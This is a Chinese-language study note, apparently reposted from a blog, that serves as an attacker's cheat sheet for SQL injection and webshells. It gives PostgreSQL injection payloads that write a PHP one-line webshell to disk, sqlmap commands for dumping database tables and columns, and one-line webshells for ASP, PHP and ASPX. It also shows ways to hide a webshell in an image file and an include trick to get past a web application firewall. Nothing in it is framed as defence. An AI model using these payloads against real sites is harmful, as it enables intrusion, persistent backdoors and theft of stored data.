×××学习笔记

日志文件后缀:.ldf
删除数据库要先分离,再从硬盘删除,新建数据库时,可看到路径
判断是否是mssql,and user>0
and 1=cast(version() as int) 获取数据库版本信息系统信息
and 1=cast(user||123 as int) 获取当前用户名称 postgres用户相当月root用户
;create table xxx(w text not null)
;insert into xxx values($$<?php @eval($_post[密码]);?>$$); 向X表中插入一句话×××
copy xxx(w) to $$/路径/文件名.php$$; 将一句话×××保存为php文件
提交方式:
get post cookie

测试工具pangolin sqlmap
sqlmap.py -u "注入点"
sqlmap.py -u "注入点" --data "表单参数名称"
sqlmap.py -u "注入点" --data "表单参数名称" --dbs 爆数据库名称
sqlmap.py -u "注入点" --data "表单参数名称" --tables爆出表名
sqlmap.py -u "注入点" --data "表单参数名称" --columns -T"表名" -D "数据库名" 爆列名
sqlmap.py -u "注入点" --data "表单提交数据" --dump -C "列名称" -T "表名" -D"数据库名"

cookie提交用于账号密码的cookie缓存
还可以通过cookie注入来突破简单的防注入系统

asp一句话
<%eval request("密码")%>

参数注入:
数字型注入:
asp?id=5 and 1=1
字符型注入:
asp?id=你好'and 1=1 #闭合字符串,并且#注释掉后面
搜索型注入:

burp抓搜索框数据,另存为txt文本
sqlmap.py -r txt文本 --tables 猜表名
sapmap.py -r txt文本 --columns -T "列名" 猜列名
sqpmap.py -r txt文本 --C "列名,列名" -T "表名" --dump -V 2 列名

静态页面可通过后缀判断是否为伪静态
id=2018.htm .htm取消掉,正常页面,则证明为伪静态
小马一般只有上传功能,普遍用来上传大马
asp一句话
<%eval request("fahai")%>
php一句话
<?php @eval($_POST[value]);?>
aspx一句话
<%@ Page Language="密码"%>
<%eval(Request.Item["value"])%>

骚操作:
cmd制作一句话:copy /b 图片.jpg+一句话.asp 图片.jpg
C32拖进图片,十六进制模式,一句话复制到最后,保存
win7下右键,属性,版权,插入一句话

包含突破waf
asp包含:<!--#include file="插入了一句话的图片马子"-->

猜你喜欢

转载自blog.51cto.com/3945465/2139195